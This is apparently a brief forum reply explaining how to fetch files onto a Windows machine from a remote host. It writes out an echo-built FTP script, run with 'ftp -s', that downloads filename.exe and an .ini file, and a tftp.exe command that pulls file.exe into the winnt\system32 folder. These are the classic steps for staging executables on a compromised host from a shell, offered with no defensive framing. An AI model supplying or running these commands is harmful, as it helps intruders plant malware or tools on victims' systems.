well i guess echo or tftp
the echo script would be
echo open ip port>>C:\file.txt
echo login>>C:\file.txt
echo pass>>C:\file.txt
echo binary>>C:\file.txt
echo get filename.exe>>C:\file.txt
echo get 2ndfile.ini>>C:\file.txt
echo quit>>C:\file.txt
and then
ftp -s:C:\file.txt
or by tftp :
in root dir (winnt\system32\)
tftp.exe -i ip get file.exe C:\winnt\system32\file.exe for example
hope u got it